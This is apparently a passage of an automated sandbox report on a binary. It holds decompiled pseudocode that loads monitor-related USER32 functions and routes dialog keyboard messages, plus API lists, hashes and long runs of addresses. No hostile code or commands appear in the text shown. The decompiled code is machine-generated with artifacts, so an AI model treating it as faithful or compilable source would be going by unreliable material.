                                                      					__eflags = _t18;
                                                      					if(_t18 == 0) {
                                                      						L12:
                                                      						 *0x446280 = 0;
                                                      						 *0x446284 = 0;
                                                      						 *0x446288 = 0;
                                                      						 *0x44628c = 0;
                                                      						 *0x446290 = 0;
                                                      						 *0x446294 = 0;
                                                      						 *0x446298 = 0;
                                                      						_t5 = 0;
                                                      					} else {
                                                      						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                      						__eflags = _t6;
                                                      						 *0x446280 = _t6;
                                                      						if(_t6 == 0) {
                                                      							goto L12;
                                                      						} else {
                                                      							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                      							__eflags = _t7;
                                                      							 *0x446284 = _t7;
                                                      							if(_t7 == 0) {
                                                      								goto L12;
                                                      							} else {
                                                      								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                      								__eflags = _t8;
                                                      								 *0x446288 = _t8;
                                                      								if(_t8 == 0) {
                                                      									goto L12;
                                                      								} else {
                                                      									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                      									__eflags = _t9;
                                                      									 *0x44628c = _t9;
                                                      									if(_t9 == 0) {
                                                      										goto L12;
                                                      									} else {
                                                      										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                      										__eflags = _t10;
                                                      										 *0x446294 = _t10;
                                                      										if(_t10 == 0) {
                                                      											goto L12;
                                                      										} else {
                                                      											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                      											__eflags = _t11;
                                                      											 *0x446290 = _t11;
                                                      											if(_t11 == 0) {
                                                      												goto L12;
                                                      											} else {
                                                      												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                      												__eflags = _t12;
                                                      												 *0x446298 = _t12;
                                                      												if(_t12 == 0) {
                                                      													goto L12;
                                                      												} else {
                                                      													_t5 = 1;
                                                      													__eflags = 1;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					 *0x44629c = 1;
                                                      					return _t5;
                                                      				} else {
                                                      					_t24 =  *0x446290; // 0x0
                                                      					return 0 | _t24 != 0x00000000;
                                                      				}
                                                      			}


















                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,770D5D80,004078C3,?,?,?,?,?,?,?,00409759,00000000,00000002,00000028), ref: 004077A0
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 004077BC
                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 004077CD
                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004077DE
                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 004077EF
                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00407800
                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00407811
                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00407822
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                      • API String ID: 667068680-68207542
                                                      • Opcode ID: 304039f2eb906d1ae472532b4b0e425858feec055aff9d1457e8f6a911d7cdbb
                                                      • Instruction ID: 460c29bc39fe871b276e37692eac700ddae52ba8710db786ada5c1a6ecd8e9b2
                                                      • Opcode Fuzzy Hash: 304039f2eb906d1ae472532b4b0e425858feec055aff9d1457e8f6a911d7cdbb
                                                      • Instruction Fuzzy Hash: E52181B5E05A05BBC7017F29ACC542ABBE4B28B74036655BFE008E22A0D7BC6045DF5F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E0041947F(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v24;
                                                      				int _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				struct HWND__* _v52;
                                                      				signed int _t139;
                                                      				signed int _t141;
                                                      				void* _t142;
                                                      				signed int _t146;
                                                      				signed int _t149;
                                                      				intOrPtr _t150;
                                                      				signed int _t152;
                                                      				signed char _t153;
                                                      				signed int _t154;
                                                      				signed int _t155;
                                                      				int _t156;
                                                      				signed int _t161;
                                                      				signed int _t165;
                                                      				void* _t167;
                                                      				signed char _t171;
                                                      				signed int _t172;
                                                      				signed int _t173;
                                                      				signed int _t174;
                                                      				signed char _t182;
                                                      				intOrPtr _t183;
                                                      				signed int _t184;
                                                      				short _t188;
                                                      				signed int _t189;
                                                      				signed int _t190;
                                                      				signed int _t191;
                                                      				signed int _t195;
                                                      				signed int _t198;
                                                      				signed char _t199;
                                                      				signed int _t200;
                                                      				signed int _t201;
                                                      				short _t204;
                                                      				signed int _t206;
                                                      				signed int _t207;
                                                      				signed int _t208;
                                                      				signed int _t209;
                                                      				void* _t211;
                                                      				signed int _t215;
                                                      				signed int _t216;
                                                      				struct HWND__* _t217;
                                                      				struct tagMSG* _t221;
                                                      				intOrPtr _t224;
                                                      				void* _t231;
                                                      				void* _t234;
                                                      				struct tagMSG* _t240;
                                                      				signed int _t242;
                                                      				int _t243;
                                                      				signed int _t244;
                                                      				long _t247;
                                                      				intOrPtr _t249;
                                                      				signed int _t251;
                                                      				signed int _t254;
                                                      				signed int _t255;
                                                      				signed int _t256;
                                                      				signed int _t257;
                                                      				signed int _t258;
                                                      				void* _t260;
                                                      				void* _t262;
                                                      
                                                      				_t232 = __ecx;
                                                      				_t260 = _t262;
                                                      				_push(__ecx);
                                                      				_v8 = _v8 & 0x00000000;
                                                      				_push(__ebx);
                                                      				_push(__esi);
                                                      				_push(__edi);
                                                      				_t139 = E004192DC(_a4, _a8);
                                                      				_t238 = _t139;
                                                      				if(_t139 == 0) {
                                                      					_t232 = _a4;
                                                      					_t231 = E004085E2(_a4);
                                                      					if(_t231 != 0) {
                                                      						_t221 =  *((intOrPtr*)(_t231 + 0x44));
                                                      						_a8 = _t221;
                                                      						if(_t221 != 0) {
                                                      							while(1) {
                                                      								_t9 = _t231 + 0x40; // 0x40
                                                      								_t232 = _t9;
                                                      								_t258 =  *(E00406B97( &_a8));
                                                      								_t224 =  *((intOrPtr*)(_t258 + 4));
                                                      								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
                                                      									break;
                                                      								}
                                                      								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
                                                      									if(_a8 != 0) {
                                                      										continue;
                                                      									} else {
                                                      									}
                                                      								} else {
                                                      									break;
                                                      								}
                                                      								goto L10;
                                                      							}
                                                      							_t238 = _t258;
                                                      						}
                                                      					}
                                                      				}
                                                      				L10:
                                                      				_t247 = 0;
                                                      				while(1) {
                                                      					_t238 = E0041932E(_t232, _a4, _t238, _a12);
                                                      					if(_t238 == 0) {
                                                      						break;
                                                      					}
                                                      					_t142 = E00418DD9(_t238);
                                                      					_pop(_t232);
                                                      					if(_t142 == 0) {
                                                      						L14:
                                                      						if(_t238 == 0) {
                                                      							L21:
                                                      							__eflags =  *(_t238 + 4);
                                                      							if(__eflags == 0) {
                                                      								E004037E3(0, _t232, _t238, _t247, __eflags);
                                                      								asm("int3");
                                                      								_push(0x28);
                                                      								E0041F71D(E004333FF, 0, _t238, _t247);
                                                      								_t146 = _a4;
                                                      								__eflags = _t146;
                                                      								if(_t146 != 0) {
                                                      									_v48 =  *((intOrPtr*)(_t146 + 0x20));
                                                      								} else {
                                                      									_v48 = _v48 & _t146;
                                                      								}
                                                      								_t240 = _a8;
                                                      								_t249 = _t240->message;
                                                      								_v32 = _t249;
                                                      								_v52 = GetFocus();
                                                      								_t149 = E00409C97(0, _t232, _t260, _t148);
                                                      								_t229 = 0x100;
                                                      								__eflags = _t249 - 0x100;
                                                      								_v24 = _t149;
                                                      								if(_t249 < 0x100) {
                                                      									L34:
                                                      									__eflags = _t249 + 0xfffffe00 - 9;
                                                      									if(_t249 + 0xfffffe00 > 9) {
                                                      										goto L56;
                                                      									} else {
                                                      										goto L35;
                                                      									}
                                                      								} else {
                                                      									__eflags = _t249 - 0x109;
                                                      									if(_t249 <= 0x109) {
                                                      										L35:
                                                      										__eflags = _t149;
                                                      										if(_t149 == 0) {
                                                      											L56:
                                                      											_t251 = 0;
                                                      											_v28 = 0;
                                                      											_t150 = E00409C97(_t229, _t232, _t260,  *_t240);
                                                      											_v44 = _v44 & 0;
                                                      											_v36 = _t150;
                                                      											_t152 = _v32 - _t229;
                                                      											__eflags = _t152;
                                                      											_v40 = 2;
                                                      											if(_t152 == 0) {
                                                      												_t153 = E00418D8C(_v36, _t240);
                                                      												_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                      												__eflags = _t232 - 0x1b;
                                                      												if(__eflags > 0) {
                                                      													__eflags = _t232 - 0x25;
                                                      													if(_t232 < 0x25) {
                                                      														goto L75;
                                                      													} else {
                                                      														__eflags = _t232 - 0x26;
                                                      														if(_t232 <= 0x26) {
                                                      															_v44 = 1;
                                                      															goto L110;
                                                      														} else {
                                                      															__eflags = _t232 - 0x28;
                                                      															if(_t232 <= 0x28) {
                                                      																L110:
                                                      																_t171 = E00418D8C(_v24, _t240);
                                                      																__eflags = _t171 & 0x00000001;
                                                      																if((_t171 & 0x00000001) != 0) {
                                                      																	goto L75;
                                                      																} else {
                                                      																	__eflags = _v44;
                                                      																	_t232 = _a4;
                                                      																	_push(0);
                                                      																	if(_v44 == 0) {
                                                      																		_t172 = E0040D2C7(_t229, _t232, _t240);
                                                      																	} else {
                                                      																		_t172 = E0040D279(_t229, _t232, _t240);
                                                      																	}
                                                      																	_t254 = _t172;
                                                      																	__eflags = _t254;
                                                      																	if(_t254 == 0) {
                                                      																		goto L75;
                                                      																	} else {
                                                      																		__eflags =  *(_t254 + 8);
                                                      																		if( *(_t254 + 8) != 0) {
                                                      																			_t232 = _a4;
                                                      																			E0040CE23(_a4, _t254);
                                                      																		}
                                                      																		__eflags =  *(_t254 + 4);
                                                      																		if( *(_t254 + 4) == 0) {
                                                      																			_t173 =  *_t254;
                                                      																			__eflags = _t173;
                                                      																			if(_t173 == 0) {
                                                      																				_t232 = _a4;
                                                      																				_t174 = E00418E4A(_a4, _v24, _v44);
                                                      																			} else {
                                                      																				_t174 = E00409C97(_t229, _t232, _t260, _t173);
                                                      																			}
                                                      																			_t242 = _t174;
                                                      																			__eflags = _t242;
                                                      																			if(_t242 == 0) {
                                                      																				goto L75;
                                                      																			} else {
                                                      																				_t229 = 0;
                                                      																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
                                                      																				E00418E84(_t242);
                                                      																				__eflags =  *(_t254 + 8);
                                                      																				if( *(_t254 + 8) != 0) {
                                                      																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
                                                      																				}
                                                      																				goto L125;
                                                      																			}
                                                      																		} else {
                                                      																			_t232 =  *(_t254 + 4);
                                                      																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
                                                      																			goto L125;
                                                      																		}
                                                      																	}
                                                      																}
                                                      															} else {
                                                      																__eflags = _t232 - 0x2b;
                                                      																if(_t232 != 0x2b) {
                                                      																	goto L75;
                                                      																} else {
                                                      																	goto L97;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      													goto L126;
                                                      												} else {
                                                      													if(__eflags == 0) {
                                                      														L103:
                                                      														_t243 = 0;
                                                      														__eflags = 0;
                                                      														goto L104;
                                                      													} else {
                                                      														__eflags = _t232 - 3;
                                                      														if(_t232 == 3) {
                                                      															goto L103;
                                                      														} else {
                                                      															__eflags = _t232 - 9;
                                                      															if(_t232 == 9) {
                                                      																__eflags = _t153 & 0x00000002;
                                                      																if((_t153 & 0x00000002) != 0) {
                                                      																	goto L75;
                                                      																} else {
                                                      																	_t188 = GetKeyState(0x10);
                                                      																	_t255 = _a4;
                                                      																	__eflags = _t188;
                                                      																	_t229 = 0 | _t188 < 0x00000000;
                                                      																	_t232 = _t255;
                                                      																	_t189 = E0040CCE0(_t255, 0, _t188 < 0);
                                                      																	__eflags = _t189;
                                                      																	if(_t189 == 0) {
                                                      																		goto L75;
                                                      																	} else {
                                                      																		__eflags =  *(_t189 + 4);
                                                      																		if( *(_t189 + 4) == 0) {
                                                      																			_t190 =  *_t189;
                                                      																			__eflags = _t190;
                                                      																			if(_t190 == 0) {
                                                      																				_t232 = _t255;
                                                      																				_t191 = E00405D69(_t255, _v36, _t229);
                                                      																			} else {
                                                      																				_t191 = E00409C97(_t229, _t232, _t260, _t190);
                                                      																			}
                                                      																			_t244 = _t191;
                                                      																			__eflags = _t244;
                                                      																			if(_t244 != 0) {
                                                      																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
                                                      																				E00418E84(_t244);
                                                      																				E0041904E(_t229, _t232, _t260, _v24, _t244);
                                                      																				_pop(_t232);
                                                      																			}
                                                      																		} else {
                                                      																			_t195 =  *(_t189 + 4);
                                                      																			_t232 = _t195;
                                                      																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
                                                      																		}
                                                      																		goto L125;
                                                      																	}
                                                      																}
                                                      																goto L126;
                                                      															} else {
                                                      																__eflags = _t232 - 0xd;
                                                      																if(_t232 == 0xd) {
                                                      																	L97:
                                                      																	__eflags = _t153 & 0x00000004;
                                                      																	if((_t153 & 0x00000004) != 0) {
                                                      																		goto L75;
                                                      																	} else {
                                                      																		_t182 = E00418E29(_v24);
                                                      																		__eflags = _t182 & 0x00000010;
                                                      																		_pop(_t232);
                                                      																		if((_t182 & 0x00000010) == 0) {
                                                      																			_t183 = E004191CF(_a4);
                                                      																		} else {
                                                      																			_t251 = _v24;
                                                      																			_t232 = _t251;
                                                      																			_t183 = E0040C9F6(_t251);
                                                      																		}
                                                      																		_t243 = 0;
                                                      																		__eflags = _t251;
                                                      																		_v40 = _t183;
                                                      																		if(_t251 != 0) {
                                                      																			L105:
                                                      																			_t232 = _t251;
                                                      																			_t184 = E0040CA70(_t251);
                                                      																			__eflags = _t184;
                                                      																			if(_t184 != 0) {
                                                      																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
                                                      																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
                                                      																					goto L75;
                                                      																				} else {
                                                      																					_push(_t243);
                                                      																					_push(_t243);
                                                      																					_push(_t243);
                                                      																					_push(1);
                                                      																					_push(0xfffffdd9);
                                                      																					_push(_t251);
                                                      																					_v8 = _t243;
                                                      																					E0040CACD();
                                                      																					_v8 = _v8 | 0xffffffff;
                                                      																					goto L125;
                                                      																				}
                                                      																			} else {
                                                      																				MessageBeep(_t243);
                                                      																				goto L75;
                                                      																			}
                                                      																		} else {
                                                      																			L104:
                                                      																			_t251 = E004190C9(_a4, _v40);
                                                      																			__eflags = _t251 - _t243;
                                                      																			if(_t251 == _t243) {
                                                      																				goto L75;
                                                      																			} else {
                                                      																				goto L105;
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																	goto L126;
                                                      																} else {
                                                      																	goto L75;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      												goto L79;
                                                      											} else {
                                                      												_t198 = _t152;
                                                      												__eflags = _t198;
                                                      												if(_t198 == 0) {
                                                      													L62:
                                                      													_t199 = E00418D8C(_v36, _t240);
                                                      													__eflags = _v32 - 0x102;
                                                      													if(_v32 != 0x102) {
                                                      														L64:
                                                      														_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                      														__eflags = _t232 - 9;
                                                      														if(_t232 != 9) {
                                                      															L66:
                                                      															__eflags = _t232 - 0x20;
                                                      															if(__eflags == 0) {
                                                      																goto L54;
                                                      															} else {
                                                      																_push(_t240);
                                                      																_t200 = E0041947F(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
                                                      																__eflags = _t200;
                                                      																if(_t200 == 0) {
                                                      																	goto L75;
                                                      																} else {
                                                      																	_t201 =  *(_t200 + 4);
                                                      																	__eflags = _t201;
                                                      																	if(_t201 == 0) {
                                                      																		goto L75;
                                                      																	} else {
                                                      																		_t232 = _t201;
                                                      																		E004133E2(_t201, _t240);
                                                      																		L125:
                                                      																		_v28 = 1;
                                                      																	}
                                                      																}
                                                      																goto L79;
                                                      															}
                                                      														} else {
                                                      															__eflags = _t199 & 0x00000002;
                                                      															if((_t199 & 0x00000002) != 0) {
                                                      																goto L75;
                                                      															} else {
                                                      																goto L66;
                                                      															}
                                                      														}
                                                      													} else {
                                                      														__eflags = _t199 & 0x00000084;
                                                      														if((_t199 & 0x00000084) != 0) {
                                                      															goto L75;
                                                      														} else {
                                                      															goto L64;
                                                      														}
                                                      													}
                                                      												} else {
                                                      													__eflags = _t198 != 4;
                                                      													if(_t198 != 4) {
                                                      														L75:
                                                      														_t154 = _a4;
                                                      														__eflags =  *(_t154 + 0x3c) & 0x00001000;
                                                      														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
                                                      															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
                                                      															__eflags = _t165;
                                                      															_v28 = _t165;
                                                      															if(_t165 != 0) {
                                                      																_t167 = E00409C97(_t229, _t232, _t260, GetFocus());
                                                      																__eflags = _t167 - _v24;
                                                      																if(_t167 != _v24) {
                                                      																	E00418FE1(_t232, E00409C97(_t229, _t232, _t260, GetFocus()));
                                                      																	_pop(_t232);
                                                      																}
                                                      															}
                                                      														}
                                                      														L79:
                                                      														_t155 = IsWindow(_v52);
                                                      														__eflags = _t155;
                                                      														if(_t155 != 0) {
                                                      															E0041904E(_t229, _t232, _t260, _v24, E00409C97(_t229, _t232, _t260, GetFocus()));
                                                      															_pop(_t234);
                                                      															_t161 = IsWindow(_v48);
                                                      															__eflags = _t161;
                                                      															if(_t161 != 0) {
                                                      																E004191FC(_a4, _v24, E00409C97(_t229, _t234, _t260, GetFocus()));
                                                      															}
                                                      														}
                                                      														_t156 = _v28;
                                                      													} else {
                                                      														__eflags = _v24;
                                                      														if(_v24 != 0) {
                                                      															L61:
                                                      															__eflags =  *(_t240 + 8) - 0x20;
                                                      															if( *(_t240 + 8) == 0x20) {
                                                      																goto L75;
                                                      															} else {
                                                      																goto L62;
                                                      															}
                                                      														} else {
                                                      															_t204 = GetKeyState(0x12);
                                                      															__eflags = _t204;
                                                      															if(_t204 >= 0) {
                                                      																goto L75;
                                                      															} else {
                                                      																goto L61;
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										} else {
                                                      											_t256 = _t149;
                                                      											while(1) {
                                                      												__eflags =  *(_t256 + 0x50);
                                                      												if( *(_t256 + 0x50) != 0) {
                                                      													break;
                                                      												}
                                                      												_t211 = E00409C97(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
                                                      												__eflags = _t211 - _a4;
                                                      												if(_t211 != _a4) {
                                                      													_t256 = E00409C97(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
                                                      													__eflags = _t256;
                                                      													if(_t256 != 0) {
                                                      														continue;
                                                      													}
                                                      												}
                                                      												break;
                                                      											}
                                                      											__eflags = _t256;
                                                      											if(_t256 == 0) {
                                                      												L45:
                                                      												__eflags = _v32 - 0x101;
                                                      												if(_v32 == 0x101) {
                                                      													L48:
                                                      													__eflags = _t256;
                                                      													if(_t256 == 0) {
                                                      														goto L55;
                                                      													} else {
                                                      														_t257 =  *(_t256 + 0x50);
                                                      														__eflags = _t257;
                                                      														if(_t257 == 0) {
                                                      															goto L55;
                                                      														} else {
                                                      															_t206 = _a8->wParam & 0x0000ffff;
                                                      															__eflags = _t206 - 0xd;
                                                      															if(_t206 != 0xd) {
                                                      																L52:
                                                      																__eflags = _t206 - 0x1b;
                                                      																if(_t206 != 0x1b) {
                                                      																	goto L55;
                                                      																} else {
                                                      																	__eflags =  *(_t257 + 0x84) & 0x00000002;
                                                      																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
                                                      																		goto L55;
                                                      																	} else {
                                                      																		goto L54;
                                                      																	}
                                                      																}
                                                      															} else {
                                                      																__eflags =  *(_t257 + 0x84) & 0x00000001;
                                                      																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
                                                      																	L54:
                                                      																	_t156 = 0;
                                                      																} else {
                                                      																	goto L52;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												} else {
                                                      													__eflags = _v32 - _t229;
                                                      													if(_v32 == _t229) {
                                                      														goto L48;
                                                      													} else {
                                                      														__eflags = _v32 - 0x102;
                                                      														if(_v32 != 0x102) {
                                                      															L55:
                                                      															_t240 = _a8;
                                                      															goto L56;
                                                      														} else {
                                                      															goto L48;
                                                      														}
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t207 =  *(_t256 + 0x50);
                                                      												__eflags = _t207;
                                                      												if(_t207 == 0) {
                                                      													goto L45;
                                                      												} else {
                                                      													__eflags =  *(_t207 + 0x58);
                                                      													if( *(_t207 + 0x58) == 0) {
                                                      														goto L45;
                                                      													} else {
                                                      														_t208 =  *(_t207 + 0x58);
                                                      														_t232 =  *_t208;
                                                      														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
                                                      														__eflags = _t209;
                                                      														if(_t209 != 0) {
                                                      															goto L45;
                                                      														} else {
                                                      															_t156 = _t209 + 1;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									} else {
                                                      										goto L34;
                                                      									}
                                                      								}
                                                      								return E0041F7C2(_t156);
                                                      							} else {
                                                      								_t232 =  *(_t238 + 4);
                                                      								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
                                                      								__eflags = _t215 & 0x08000000;
                                                      								if((_t215 & 0x08000000) == 0) {
                                                      									goto L20;
                                                      								} else {
                                                      									goto L23;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t216 =  *(_t238 + 4);
                                                      							if(_t216 == 0) {
                                                      								_t217 =  *_t238;
                                                      							} else {
                                                      								_t217 =  *(_t216 + 0x24);
                                                      							}
                                                      							if(_t217 == 0) {
                                                      								goto L21;
                                                      							} else {
                                                      								if(IsWindowEnabled(_t217) == 0) {
                                                      									L23:
                                                      									__eflags = _t238 - _v8;
                                                      									if(_t238 == _v8) {
                                                      										break;
                                                      									} else {
                                                      										__eflags = _v8;
                                                      										if(_v8 == 0) {
                                                      											_v8 = _t238;
                                                      										}
                                                      										_t247 = _t247 + 1;
                                                      										__eflags = _t247 - 0x200;
                                                      										if(_t247 < 0x200) {
                                                      											continue;
                                                      										} else {
                                                      											break;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									L20:
                                                      									_t141 = _t238;
                                                      									L28:
                                                      									return _t141;
                                                      								}
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t232 = _a4;
                                                      						_t238 = E0040CCE0(_a4, _t238, 0);
                                                      						if(_t238 == 0) {
                                                      							break;
                                                      						} else {
                                                      							goto L14;
                                                      						}
                                                      					}
                                                      					L126:
                                                      				}
                                                      				_t141 = 0;
                                                      				__eflags = 0;
                                                      				goto L28;
                                                      			}





































































                                                      0x0041999d
                                                      0x0041998c
                                                      0x0041998d
                                                      0x0041998d
                                                      0x004199a2
                                                      0x004199a4
                                                      0x004199a6
                                                      0x00000000
                                                      0x004199ac
                                                      0x004199b2
                                                      0x004199b5
                                                      0x004199b8
                                                      0x004199bd
                                                      0x004199c0
                                                      0x004199cd
                                                      0x004199cd
                                                      0x00000000
                                                      0x004199c0
                                                      0x00419978
                                                      0x00419978
                                                      0x0041997e
                                                      0x00000000
                                                      0x0041997e
                                                      0x00419976
                                                      0x0041995d
                                                      0x00419889
                                                      0x00419889
                                                      0x0041988c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041988c
                                                      0x00419883
                                                      0x0041987a
                                                      0x00000000
                                                      0x00419737
                                                      0x00419737
                                                      0x004198c6
                                                      0x004198c6
                                                      0x004198c6
                                                      0x00000000
                                                      0x0041973d
                                                      0x0041973d
                                                      0x00419740
                                                      0x00000000
                                                      0x00419746
                                                      0x00419746
                                                      0x00419749
                                                      0x004197e8
                                                      0x004197ea
                                                      0x00000000
                                                      0x004197f0
                                                      0x004197f2
                                                      0x004197f8
                                                      0x004197fd
                                                      0x00419800
                                                      0x00419803
                                                      0x00419808
                                                      0x0041980d
                                                      0x0041980f
                                                      0x00000000
                                                      0x00419815
                                                      0x00419815
                                                      0x00419819
                                                      0x0041982e
                                                      0x00419830
                                                      0x00419832
                                                      0x00419840
                                                      0x00419842
                                                      0x00419834
                                                      0x00419835
                                                      0x00419835
                                                      0x00419847
                                                      0x00419849
                                                      0x0041984b
                                                      0x00419854
                                                      0x00419859
                                                      0x00419862
                                                      0x00419868
                                                      0x00419868
                                                      0x0041981b
                                                      0x0041981b
                                                      0x00419821
                                                      0x00419823
                                                      0x00419823
                                                      0x00000000
                                                      0x00419819
                                                      0x0041980f
                                                      0x00000000
                                                      0x0041974f
                                                      0x0041974f
                                                      0x00419752
                                                      0x00419892
                                                      0x00419892
                                                      0x00419894
                                                      0x00000000
                                                      0x0041989a
                                                      0x0041989d
                                                      0x004198a2
                                                      0x004198a4
                                                      0x004198a5
                                                      0x004198b6
                                                      0x004198a7
                                                      0x004198a7
                                                      0x004198aa
                                                      0x004198ac
                                                      0x004198ac
                                                      0x004198bb
                                                      0x004198bd
                                                      0x004198bf
                                                      0x004198c2
                                                      0x004198dd
                                                      0x004198dd
                                                      0x004198df
                                                      0x004198e4
                                                      0x004198e6
                                                      0x004198f4
                                                      0x004198f7
                                                      0x00000000
                                                      0x004198fd
                                                      0x004198fd
                                                      0x004198fe
                                                      0x004198ff
                                                      0x00419900
                                                      0x00419902
                                                      0x00419907
                                                      0x00419908
                                                      0x0041990b
                                                      0x00419913
                                                      0x00000000
                                                      0x00419913
                                                      0x004198e8
                                                      0x004198e9
                                                      0x00000000
                                                      0x004198e9
                                                      0x004198c4
                                                      0x004198c8
                                                      0x004198d3
                                                      0x004198d5
                                                      0x004198d7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004198d7
                                                      0x004198c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419752
                                                      0x00419749
                                                      0x00419740
                                                      0x00419737
                                                      0x00000000
                                                      0x004196a1
                                                      0x004196a2
                                                      0x004196a2
                                                      0x004196a3
                                                      0x004196cf
                                                      0x004196d3
                                                      0x004196d8
                                                      0x004196df
                                                      0x004196e5
                                                      0x004196e5
                                                      0x004196e9
                                                      0x004196ed
                                                      0x004196f3
                                                      0x004196f3
                                                      0x004196f7
                                                      0x00000000
                                                      0x004196fd
                                                      0x004196fd
                                                      0x00419704
                                                      0x00419709
                                                      0x0041970b
                                                      0x00000000
                                                      0x0041970d
                                                      0x0041970d
                                                      0x00419710
                                                      0x00419712
                                                      0x00000000
                                                      0x00419714
                                                      0x00419715
                                                      0x00419717
                                                      0x004199d3
                                                      0x004199d3
                                                      0x004199d3
                                                      0x00419712
                                                      0x00000000
                                                      0x0041970b
                                                      0x004196ef
                                                      0x004196ef
                                                      0x004196f1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004196f1
                                                      0x004196e1
                                                      0x004196e1
                                                      0x004196e3
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004196e3
                                                      0x004196a5
                                                      0x004196a5
                                                      0x004196a8
                                                      0x00419758
                                                      0x00419758
                                                      0x0041975b
                                                      0x00419761
                                                      0x00419769
                                                      0x0041976f
                                                      0x00419771
                                                      0x00419774
                                                      0x0041977f
                                                      0x00419784
                                                      0x00419787
                                                      0x00419792
                                                      0x00419797
                                                      0x00419797
                                                      0x00419787
                                                      0x00419774
                                                      0x00419798
                                                      0x004197a1
                                                      0x004197a3
                                                      0x004197a5
                                                      0x004197b9
                                                      0x004197bf
                                                      0x004197c3
                                                      0x004197c5
                                                      0x004197c7
                                                      0x004197d8
                                                      0x004197d8
                                                      0x004197c7
                                                      0x004197dd
                                                      0x004196ae
                                                      0x004196ae
                                                      0x004196b1
                                                      0x004196c4
                                                      0x004196c4
                                                      0x004196c9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004196b3
                                                      0x004196b5
                                                      0x004196bb
                                                      0x004196be
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004196be
                                                      0x004196b1
                                                      0x004196a8
                                                      0x004196a3
                                                      0x004195d6
                                                      0x004195dc
                                                      0x004195de
                                                      0x004195de
                                                      0x004195e2
                                                      0x00000000
                                                      0x00000000
                                                      0x004195ea
                                                      0x004195ef
                                                      0x004195f2
                                                      0x004195ff
                                                      0x00419601
